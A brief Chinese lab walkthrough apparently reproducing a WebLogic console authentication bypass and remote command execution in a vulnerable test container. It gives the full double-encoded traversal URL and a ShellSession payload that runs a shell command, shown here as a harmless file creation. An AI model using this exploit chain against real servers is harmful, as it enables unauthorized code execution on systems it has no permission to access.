ip:/console进入登录页面
然后我们输入
ip:7001/console/css/%252e%252e%252fconsole.portal进行登陆绕过
然后我们进行访问
http://ip:7001/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec('touch%20/tmp/txt');")
利用com.tangosol.coherence.mvel2.sh.ShellSession执行命令
我们看到页面回显404,进入环境漏洞容器中查看文件是否被建立
可以看到文件已经被成功建立